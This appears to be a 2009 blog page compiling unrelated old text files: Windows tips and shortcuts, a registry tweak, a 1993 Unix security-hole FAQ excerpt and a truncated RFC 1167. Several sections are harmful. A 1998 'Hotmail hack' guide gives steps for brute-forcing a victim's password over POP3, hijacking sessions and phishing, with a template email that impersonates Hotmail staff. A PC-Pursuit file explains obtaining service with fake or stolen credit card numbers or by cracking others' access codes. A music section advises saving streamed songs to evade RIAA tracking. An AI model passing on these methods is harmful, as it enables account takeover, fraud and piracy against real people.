Selasa, 05 Mei 2009

Cant See Secure Sites

Cant See Secure Sites

Fix the problem with seeing them secrue sites (banks or online stores) i found this very usefull to me at my work (isp backbone support lol, at the time i was regular support )

Any way... what u need to do is make a new notepad file and write in it the followng DLL's.. just copy-paste these

regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll

and save it as > all file types, and make it something like securefix.bat.

then just run the file and ur problem shuld be gone.

Best Keyboard Shortcuts

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.

Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box

acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.

Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog

internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it

For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:

Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:

Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

How To optimize DSL-CABLE connection speed

How To optimize DSL-CABLE connection speed

First, u need to goto Start, then run. Type in regedit in the box. Next, goto the folder HKEY_LOCAL_MACHINE\System\CurrentControlSet\VxD\MSTCP
Now, find the string DefaultRcvWindow . Now, edit the number to 64240 then restart your computer. There you go. High speed cable modem now with out dloading a program. Original value is 373360

Download Free Music legally,, legally

Are you scared that the RIAA is about to track you down for illegally downloading songs.
Well, here is a method of obtaining many songs absolutely free that is virtually untrackable
by modern technology. This has to do with capturing streaming audio, which in many cases, believe it or not
are plain old mp3s just waiting for you to "download." I have found most of the current top-40 as well as many others you may like, so keep searching. The music is waiting for you to find it.

Step 1:
First of all, you need to find a good site that hosts streaming audio. My favorite that has brought me many songs to date is hxxp://www.windowsmedia.com . Some others are just as good, but this is the site that I will be referencing (plus, I know you guys love to steal from Microsoft).

Step 2:
Alright, go up to the left hand corner where there is an empty text box. This is the search box, just fill it with a songname or artist just like you would in kazaa and click search. This will bring up a page with links to many websites hosting a stream by that artist. The ones with music notes are just that...music, this is what you want. In many cases, this is all you need. Just right click on one of the links and click "save as" to save the song. This works if the file extension is .mp3 or .wma or .asf or well-other known formats. If this worked, you are finished, otherwise continue reading.

Step 3:
However, if you encounter a .asx file, there are a few more steps you will have to endure. First of all, do exactly like the above example and save the file locally. After the file is downloaded, check to see how large the file is. If it is a large file in the megabyte range, then you should be able to play it in your favorite music program. However, if it is less than 1 kilobyte, open it as a textfile. You will then see many script commands that communicate to windows media player. Don't worry about these, just look for some URLs which will most likely be pointing to a .asf file. It will have at least one if not more. Open the new found URL in your browser and save it like in step 2 and you should be good to go. (I use Mozilla, because Internet Explorer likes to open things rather than save them as I tell it)

NOTE: If any of the URLs are preceded with "mms://" instead of "http://" find another URL, because this technique will not work.

This technique is especially useful to avoid prosecution because streaming audio, and downloading it appear the same to a web server, therefore you are seen as just another "legal" listener, so "download" away my friend and don't blame me if this soon becomes illegal (if it isn't already).

Step 4:
If you are picky then search for a program that will convert these file types to mp3s. I assure you there are many sites out there.

If this technique does not work for some reason, there is another technique which is manually recording streaming audio, with an audio capture program. I use the one that came with my soundcard (Audigy 2ZS, great soundcard), but I would recommend it only as a last resort such as with "mms://" files. There is a degredation in quality compared to the other formats and it records every sound your PC makes while it is recording so don't chat on AIM while recording (lol I can hear random doors slamming now).

How to find Security Holes

From: Manifestation
Subject: Security holes manifest themselves in (broadly) four ways...
Date: 11.10.93

( Please contribute by sending E-Mail to ... )

[quoting from the comp.security.unix FAQ]
Security holes manifest themselves in (broadly) four ways:

1) Physical Security Holes.

- Where the potential problem is caused by giving unauthorised persons
physical access to the machine, where this might allow them to perform
things that they shouldn't be able to do.

A good example of this would be a public workstation room where it would
be trivial for a user to reboot a machine into single-user mode and muck
around with the workstation filestore, if precautions are not taken.

Another example of this is the need to restrict access to confidential
backup tapes, which may (otherwise) be read by any user with access to
the tapes and a tape drive, whether they are meant to have permission or
not.

2) Software Security Holes

- Where the problem is caused by badly written items of "privledged"
software (daemons, cronjobs) which can be compromised into doing things
which they shouldn't oughta.

The most famous example of this is the "sendmail debug" hole (see
bibliography) which would enable a cracker to bootstrap a "root" shell.
This could be used to delete your filestore, create a new account, copy
your password file, anything.

(Contrary to popular opinion, crack attacks via sendmail were not just
restricted to the infamous "Internet Worm" - any cracker could do this
by using "telnet" to port 25 on the target machine. The story behind a
similar hole (this time in the EMACS "move-mail" software) is described
in [Stoll].)

New holes like this appear all the time, and your best hopes are to:

a: try to structure your system so that as little software as possible
runs with root/daemon/bin privileges, and that which does is known to
be robust.

b: subscribe to a mailing list which can get details of problems
and/or fixes out to you as quickly as possible, and then ACT when you
receive information.

>From: Wes Morgan
>
> c: When installing/upgrading a given system, try to install/enable only
> those software packages for which you have an immediate or foreseeable
> need. Many packages include daemons or utilities which can reveal
> information to outsiders. For instance, AT&T System V Unix' accounting
> package includes acctcom(1), which will (by default) allow any user to
> review the daily accounting data for any other user. Many TCP/IP packa-
> ges automatically install/run programs such as rwhod, fingerd, and
> tftpd, all of which can present security problems.
>
> Careful system administration is the solution. Most of these programs
> are initialized/started at boot time; you may wish to modify your boot
> scripts (usually in the /etc, /etc/rc, /etc/rcX.d directories) to pre-
> vent their execution. You may wish to remove some utilities completely.
> For some utilities, a simple chmod(1) can prevent access from unauthorized
> users.
>
> In summary, DON'T TRUST INSTALLATION SCRIPTS/PROGRAMS! Such facilities
> tend to install/run everything in the package without asking you. Most
> installation documentation includes lists of "the programs included in
> this package"; be sure to review it.

3) Incompatible Usage Security Holes

- Where, through lack of experience, or no fault of his/her own, the
System Manager assembles a combination of hardware and software which
when used as a system is seriously flawed from a security point of view.
It is the incompatibility of trying to do two unconnected but useful
things which creates the security hole.

Problems like this are a pain to find once a system is set up and
running, so it is better to build your system with them in mind. It's
never too late to have a rethink, though.

Some examples are detailed below; let's not go into them here, it would
only spoil the surprise.

4) Choosing a suitable security philosophy and maintaining it.

>From: Gene Spafford
>The fourth kind of security problem is one of perception and
>understanding. Perfect software, protected hardware, and compatible
>components don't work unless you have selected an appropriate security
>policy and turned on the parts of your system that enforce it. Having
>the best password mechanism in the world is worthless if your users
>think that their login name backwards is a good password! Security is
>relative to a policy (or set of policies) and the operation of a system
>in conformance with that policy.

---

From: Hacking
Subject: Hacking Ideas
Date: 11/10/93

( Please contribute by sending E-Mail to ... )

[ Many ideas taken from: HaxNet - APG V1.3 : Guide to finding new holes]

NOTE: I think this should be divided into general categories:
1) General principles
2) Looking for holes in src (most items here)
3) Looking in binary distributions
4) Looking in site specific configurations

The following general classifications suggest themselves:
1) SUID/SGID
2) Return codes/error conditions
3) unexpected input
4) race conditions
5) authentication
6) implicit trust
7) parameters
8) permissions
9) interrupts
10) I/O
11) symbolic links
12) Daemons, particularly those taking user input.
13) Kernel race conditions
14) what else? - please add categories

(Suggested splitting of above into main and sub-catagories)
I: Suid binaries and scripts
unexpected user interactions
flawed liberary calls
implicit assumptions of external conditions (sym links, loc. paths)
race conditions
II: daemons running with priviliged uid's
race conditions
poor file protectons
implicit file protections
trust
authentication
III: Kernel problems
Kernel race conditions
device driver code

The following four step method was created by System Development
Corporation, who report a 65% success rate on the flaw hypotheses
generated. Doing a comprehensive search for operating system flaws
requires four steps:

Step 1) Knowledge of system control structure.
===============================================
To find security holes, and identifying design weaknesses it is
necessary to understand the system control structure, and layers.
One should be able to list the:
A) security objects: items to be protected. ie: a users file.
B) control objects: items that protect security objects. ie: a i-node
C) mutual objects : objects in both classes. ie: the password file
With such a list, it is possible to graphically represent a control
hierarchy and identify potential points of attack. Making flow charts
to give a visual breakdown of relationships definitely helps.
Reading the various users, operators, and administrators manuals should
provide this information.
(following para's should probably be moved to a "legal" section)
Reading and greping source code should also prove valuable. For those
without a source licence, I would suggest we use LINUX, NET2, and BSD386
distributions in order to stay legal. At some future time we may be able
to form a working contract between someone or a company with legal access
to other distributions and members actively participating in this project.
It appears that extracts of proprietary code may be used for academic
study, so long as they are not reused in a commercial product - more
checking is necessary though.

Step 2) Generate an inventory of suspected flaws. (i.e. flaw hypotheses)
========================================================================
In particular we want:
Code history:
What UNIX src does a particular flavor derive from? This is important
for cross references (very often only one vendor patches certain code,
which may get reused, in it's unpatched reincarnation by others)
A solid cross reference:
Who checked which bug in what OS and what version prevents us from
duplicating work.

A good start would be listing all the suid binaries on the various OS
flavors/versions. Then try to work out why each program is suid. i.e.:
rcp is suid root because it must use a privilaged port to do user
name authentication.
Often code that was never designed to be suid, is made suid, durring
porting to solve file access problems.
We need to develope a data base that will be able to look at pairs and
triplets of data, specificly: program name, suid, sgid, object accessed
(why prog is suid/sgid), OS flavor/version, and flav/vers geniology.
Any sugestions on how to implement such a DB?

Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================

Step 4) Make generalizations of the underlying system weaknesses, for
which the flaw represents a specific instance.
=====================================================================

Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e.
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp()
OR execvp()]} /usr/local/src/*.c

PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.

TCOV:

CRASH: Posted to USENET (what FTP archive?) (descrip?)

PAPERS: There are several papers that discuss methods of finding flaws, and
present test suites.
1) An Emphirical Study of the reliability of UNIX Utilities, by Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm ACM, v33 n12, pp32-44,
Dec '90. Describes a test suite for testing random input strings.
Results indicated that 25% of the programs hung, crashed, or misbehaved.
In one case the OS crashed. An understanding of buffer and register
layout on the environment in question, and the expected input is likely
to produce the desired results.
2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years
ago. (Anyone have a citation?).

Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
ie: the gets() family of routines, where it is possible to overwrite
buffer boundaries. ( sprintf()?, gets(), etc. )
also: strcpy() which is why most src has:
#define SCYPYN((a)(b)) strcpy(a, b, sizeof(a))

2) SUID/SGID routines written in one of the shells, instead of C or
PERL.

3) SUID/SGID routines written in PERL that don't use the "taintperl"
program.)

4) SUID/SGID routines that use the system(), popen(), execlp(), or
execvp() calls to run something else.

5) Any program that uses relative path names inside the program.

6) The use of relative path names to specify dynamically linked libraries.
(look in Makefile).

7) Routines that don't check error return codes from system calls. (ie:
fork(2), suid(2), etc), setuid() rather, as in the famous rcp bug

8) Holes can often be found in code that:
A) is ported to a new environment.
B) receives unexpected input.
C) interacts with other local software.
D) accesses system files like passwd, L.sys, etc.
E) reads input from a publicly writable file/directory.
F) diagnostic programs which are typically not user-proofed.

9) Test code for unexpected input. Coverage, data flow, and mutation
testing tools are available.

10) Look in man pages, and users guides for warnings against doing X, and
try variations of X. Ditto for "bugs" section.

11) Look for seldom used, or unusual functions or commands - read backwards.
In particular looking for undocumented flags/arguments may prove useful.
Check flags that were in prior releases, or in other OS versions. Check
for options that other programs might use. For instance telnet uses -h
option to login ...
right, as most login.c's I've seen have:
if((getuid()) && hflag){
syslog()
exit()
}

12) Look for race conditions.

13) Failure of software to authenticate that it is really communicating
with the desired software or hardware module it wants to be accessing.

14) Lack or error detection to reset protection mechanisms following an
error.

15) Poor implementation resulting in, for example, condition codes being
improperly tested.

16) Implicit trust: Routine B assumes routine A's parameters are correct
because routine A is a system process.

17) System stores it's data or references user parameters in the users
address space.

18) Inter process communication: return conditions (passwd OK, illegal
parameter, segment error, etc) can provide a significant wedge, esp.
when combined with (17).

19) User parameters may not be adequately checked.

20) Addresses that overlap or refer to system areas.

21) Condition code checks may be omitted.

22) Failure to anticipate unusual or extraordinary parameters.

23) Look for system levels where the modules involved were written by
different programmers, or groups of programmers - holes are likely
to be found.

24) Registers that point to the location of a parameters value instead
of passing the value itself.

25) Any program running with system privileges. (too many progs are given
uid 0, to facilitate access to certain tables, etc.)

26) Group or world readable temporary files, buffers, etc.

27) Lack of threshold values, and lack of logging/notification once these
have been triggered.

28) Changing parameters of critical system areas prior to their execution
by a concurrent process. (race conditions)

29) Inadequate boundary checking at compile time, for example, a user
may be able to execute machine code disguised as data in a data area.
(if text and data areas are shared)

30) Improperly handling user generated asynchronous interrupts. Users
interrupting a process, performing an operation, and either returning
to continue the process or begin another will frequently leave the
system in an unprotected state. Partially written files are left open,
improper writing of protection infraction messages, improper setting
of protection bits, etc often occur.

31) Code that uses fopen(3) without setting the umask. ( eg: at(1), etc. )
In general, code that does not reset the real and effective uid before
forking.

32) Trace is your friend (or truss in SVR4) for helping figure out what
system calls a program is using.

33) Scan /usr/local fs's closely. Many admins will install software from
the net. Often you'll find tcpdump, top, nfswatch, ... suid'd root for
their ease of use.

34) Check suid programs to see if they are the ones originally put on the
system. Admins will sometimes put in a passwd replacement which is less
secure than the distributed version.

35) Look for programs that were there to install software or loadable
kernel modules.

36) Dynamically linked programs in general. Remember LD_PRELOAD, I think
that was the variable.

37) I/O channel programming is a prime target. Look for logical errors,
inconsistencies, and omissions.

38) See if it's possible for a I/O channel program to modify itself, loop
back, and then execute the newly modified code. (instruction pre-load
may screw this up)

39) If I/O channels act as independent processors they may have unlimited
access to memory, thus system code may be modified in memory prior to
execution.

40) Look for bugs requiring flaws in multiple pieces of software, i.e. say
program a can be used to change config file /etc/a now program b assumes
the information in a to be correct and this leads to unexpected results
(just look at how many programs trust /etc/utmp)

41) Any program, especially those suid/sgid, that allow shell escapes.

A Small Guide to Hacking HOTMAIL

From hacker@mitchell.demon.nl Mon Mar 02 20:09:04 1998
Newsgroups: alt.hacking
Subject: Hotmail Hack info !
From: Terry Mitchell
Date: Mon, 02 Mar 1998 12:09:04 -0800

HOTMAIL HACKING INFO.

I_1_I - Brute force hacking
a. Use telnet to connect to port 110 (Hotmail´s pop-server)
b. Type USER and then the victim´s username
c. Type PASS and then the guess a password
d. Repeat that until U have found the correct password.
!. This is called brute force hacking and requires patience.
It´s better than trying to guess the victims password on
hotmail homepage only because it´s faster.
____
I_2_I - The Best way
a. Get the username of the victim (It usually stands in the adress-field
)
b. Then type " www.hotmail.com/cgi-bin/start/victimsusername "
c. U´re in!
!. This hack only work if U are on the same network or computer as the
victim and if he don´t log out.
____
I_3_I - The old way
a. Go to http://www.hotmail/proxy.html
b. Now type the victims username. (press login)
c. Look at the source code.
d. On the fifth row U should find "action=someadress"
e. Copy that adress and paste it into the adress-field
f. You are in...
!. As you can see it´s a long procedure and the victim have
plenty of time to log out.
____
I_4_I - Another...
a. Go to hotmail´s homepage
b. Copy the source code.
c. Make a new html file with the same code but change method=post to
method=enter
d. "view" the page
e. Change the adress to www.hotmail.com/ (don´t press enter!)
f. Make the victim type in his username and password
g. Look in the adress-field. There you´ll see ...&password:something...
!. This is the way I use, because it lets you know the password.
(If he exits the browser U can see the password in the History folder!)

READ!
Hotmail´s sysops have changed the "system" so that the victim may log
out even
if U are inside his/her account. So don´t waste U´r time!

---

So you want to get some hotmail passwords?
This is pretty easy to do once you have got the hang of it.
If you are a beginner, I wouldn't make this your first attempt at
hacking. When you need to do is use a port surfer and surf over to
port 80. While there, you have to try and mail the user that you
want the password from. It is best to mail them using the words
"We" and "Here at Hotmail..." Most suckers fall for this and end
up giving out their password. There is another way to also, you can
get an anon mailer, and forge the addres as staff@hotmail.com. But
you have to change the reply address to go to a different addres
like user@host.com. The person that you are trying to get the pass
from MUST respond to that letter for the mail to be forwarded to you.
Have text like "Please reply to this letter with the subject "PASSWORD"
and underneith please include your user name and password.
If you have trouble Loging in withing the next few days, this is
only because we are updating our mail servers but no need to worry,
your mail will still be there. Even though the server may be down
for an hour. From the staff at Hotmail, Thank You."

Hacking PC-Pursuit Codes

Hacking PC-Pursuit Codes

OK, people... This is going to be all you need to know about
PC-Pursuit and how to use it to the fullest extent without
paying for it.

First let's look at what we need to know:

1. Functions of PC-Pursuit
2. How you can get your own PC-Pursuit account
3. How to use PC-Pursuit
4. City Codes for PC-Pursuit

Let's look at them one at a time, shall we?

*)> 1 - Functions of PC-Pursuit <(*

Basically, PC-Pursuit is a subsidiary of Telenet, which is a
subsidiary of U.S. Sprint (ugh!).
What PC-Pursuit is is a chain of modems that a registered
user can access to make long-distance calls for only $25 a
month.
Sounds great, doesn't it? Of course, but there ARE some
catches, of course.
Namely that you have do ONLY calls via modem, no voice.
And that all calls must be made between 6pm (local time) and
7 am, lest you get some hefty surcharges.

BUT, my friends, there is a way that you can use PC-Pursuit
for less that the flat $25 a month... Namely for FREE...
Which brings us to number 2...

*)> 2 - How you can get your own PC-Pursuit account <(*

Now, there are two ways to get around the fees. The easy way
(laden with risks), and the hard way (fewer risks)

Let's look at them one at a time.

The EASY way to hack an account on PC-Pursuit isn't even
hacking, really...
When you call the PC-Pursuit main bulletin board (more on
that later), you can sign up for PC-Pursuit. BUT you need a
major credit card...
Again, we have two choices for this.
We can either enter a bullshit credit card number with the
proper format and a phoney name, or a valid credit card
number that isn't your own...
Either way, you have to give them YOUR address, unless you
have a P.O. Box or a mailbox at a private company or another
location.
They will send you a packet an a week to 10 days, and then
you can just go fucking nuts calling all the PC-Pursuitable
cities (25 at last count).

That is the easy way... I told you it was risky...

The HARD way is to actually hack out someone's code on a
Telenet system (a complete national listing of all local
Telenet access numbers is available on this board).

When you log on to Telenet, you see NOTHING.. Press ENTER
twice. Simple, eh?
Next you see the first prompt from Telenet, 'TERMINAL='

Press Enter or type VT100, VT52, Dx (x = 0 to 9) or
whatever... I have not noticed any differences in any of
them as of yet...

Next you get the main Telenet prompt, the '@' symbol.

From here, a PC-Pursuit user would type this:

C D/SSCCC/BB,PCP12345,ABCD1234

C is for Connect. With This command, you can also log on to
many of the major computer services such as Delphi,
QuantumLink, and CompuServe.

The D is for Dial. Simple
The slash divides commands and parameters on Telenet
The SSCCC is SS= a two-letter state code and CCC= a three
letter city code (more on these later)

The BB is either 3, 12 or 24, depending on the baud rates
available for the particular PC-Pursuit accessible area code,
and the baud rate you want (24, in most cases)

Now the good stuff... The access codes and password.

The Access codes are ALWAYS in the format of PCPxxxxx.
Always.

The PASSWORDS are varied. They are initially registered to
the user in the format of XXXXyyyy where XXXX are four
letters and yyyy are four digits...
NOW, your saving grace from people changing their passwords
is that Telenet charges $5.00 for each password change...
So this helps...

Other commands available on Telenet are D (when not preceded
by a C) for Disconnect and HANGUP, which does just that.

Now that you have gotten your very own PC-Pursuit account,
you need to know how to use the damn thing.

*)> 3 - How to use PC-Pursuit <(*

Sure, you can issue the command from Telenet to dial the city
and baud that you want, but after it gives you the CONNECTED
message, you are as lost as a blind lesbian in a fish market.

No problem... From here on in, it's all peaches and cream.
The modems use the Hayes AT command set...

To dial your number all you do is type in this:

ATDTxxxxxxx CR

xxxxxxx = the phone number of the board you want to call.

Easy, eh? And your other major AT commands are available:

ATZ Zaps the modem back to default settings
ATH Hangs up the modem
A/ Repeats the last command given
ATDP Dials pulse (WHY?!?)
And so on.

When you want to connect to another city, Type '@' from the
modem command mode, and then 'D ' at the Telenet main
prompt. Easy as pie.

So, now you are all set and take advantage of the generous
service that another stupid multi-billion dollar corporation
has bestowed upon us, the hackers of America.

Telenet also has a couple of nifty goodies that are available
to the users of PC-Pursuit, and the general public. These
are both modem lines.

PC-Pursuit Registration & Information
1-800-835-3638 or 703-689-5700
On this BBS you can actually register for PC-Pursuit, and
find out a little about the system. It has no features, and
is pretty boring. It might be fun to crash, though.

PC-Pursuit Net Exchange BBS
At the Telenet '@' prompt, type: PC PURSUIT,YOURID,PASSWORD
or call 703-689-3561.
This BBS has new info for PC-Pursuit users (be they legal or
not). It is advisable to keep a low profile on there, as they
have had a few hackers just go nuts and bring themselves in
the spotlight. Which is good, because the heat is on them,
not the smart ones that keep a low profile and are quit.

If for some reason there is a problem with your billing (hee
hee hee) the Telenet network has their Customer Service &
Billing numbers:
1-800-336-0437 or 703-689-6400

*)>--------------------------------------------<(*
4 - Telenet City Codes
*)>--------------------------------------------<(*

PC-Pursuit
PC-Pursuit City, ST | A C | Code | Bauds Available
--------------------+-----+------------+-----------------
Atlanta, GA | 404 | D/GAATL | 3/12/24
Boston, MA | 617 | D/MABOS | 3/12/24
Chicago, IL | 312 | D/ILCHI | 3/12/24
Chicago, IL * | 815 | D/ILCHI | 3/12/24
Cleveland, OH | 216 | D/OHCLV | 3/12
Dallas, TX | 214 | D/TXDAL | 3/12/24
Dallas, TX | 817 | D/TXDAL | 3/12/24
Denver, CO | 303 | D/CODEN | 3/12/24
Detroit, MI | 313 | D/MIDET | 3/12/24
Glendale, CA | 818 | D/CAGLE | 12
Hartford, CN | 203 | D/CTHAR | 12
Houston, TX | 713 | D/TXHOU | 3/12/24
Los Angeles, CA | 213 | D/CALAN | 3/12/24
Miami, FL | 305 | D/FLMIA | 3/12
Milwaukee, WI | 414 | D/WIMIL | 12
Minneapolis, MN | 612 | D/MNMIN | 3/12/24
Newark, NJ | 201 | D/NJNEW | 3/12/24
New York, NY | 212 | D/NYNYO | 3/12/24
New York, NY * | 718 | D/NYNYO | 3/12/24
Philedelphia, PA | 215 | D/PAPHI | 3/12/24
Pheonix, AZ | 602 | D/AZPHO | 3/12/24
Portland, OR | 503 | D/ORPOR | 3/12
Triangle Park, NC | 919 | D/NCRTP | 3/12/24
...............................................................................................
Downloaded From P-80 International Information Systems 304-744-2253

Thoughts on the National Research and Education Network

Network Working Group V. Cerf
Request for Comments: 1167 CNRI
July 1990

THOUGHTS ON THE NATIONAL RESEARCH AND EDUCATION NETWORK

Status of this Memo

The memo provides a brief outline of a National Research and
Education Network (NREN). This memo provides information for the
Internet community. It does not specify any standard. It is not a
statement of IAB policy or recommendations.

Distribution of this memo is unlimited.

ABSTRACT

This contribution seeks to outline and call attention to some of the
major factors which will influence the form and structure of a
National Research and Education Network (NREN). It is implicitly
assumed that the system will emerge from the existing Internet.

ACKNOWLEDGEMENTS

The author gratefully acknowledges support from the National Science
Foundation, The Defense Advanced Research Projects Agency, the
Department of Energy and the National Aeronautics and Space
Administration through cooperative agreement NCR-8820945. The author
also acknowledges helpful comments from colleagues Ira Richer, Barry
Leiner, Hans-Werner Braun and Robert Kahn. The opinions expressed in
this paper are the personal opinions of the author and do not
represent positions of the U.S. Government, the Corporation for
National Research Initiatives or of the Internet Activities Board.
In fact, the author isn't sure he agrees with everything in the
paper, either!

A WORD ON TERMINOLOGY

The expression "national research and education network" is taken to
mean "the U.S. National Research and Education Network" in the
material which follows. It is implicitly assumed that similar
initiatives may arise in other countries and that a kind of Global
Research and Education Network may arise out of the existing
international Internet system. However, the primary focus of this
paper is on developments in the U.S.

Cerf [Page 1]
RFC 1167 NREN July 1990

FUNDAMENTALS

1. The NREN in the U.S. will evolve from the existing Internet base.
By implication, the U.S. NREN will have to fit into an international
environment consisting of a good many networks sponsored or owned and
operated by non-U.S. organizations around the world.

2. There will continue to be special-purpose and mission-oriented
networks sponsored by the U.S. Government which will need to link
with, if not directly support, the NREN.

3. The basic technical networking architecture of the system will
include local area networks, metropolitan, regional and wide-area
networks. Some nets will be organized to support transit traffic and
others will be strictly parasitic.

4. Looking towards the end of the decade, some of the networks may be
mobile (digital, cellular). A variety of technologies may be used,
including, but not limited to, high speed Fiber Data Distribution
